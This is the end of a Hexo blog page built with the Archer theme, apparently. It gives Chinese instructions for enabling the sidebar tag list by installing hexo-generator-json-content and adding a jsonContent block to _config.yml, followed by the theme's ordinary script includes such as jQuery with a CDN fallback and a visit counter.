    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "White"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


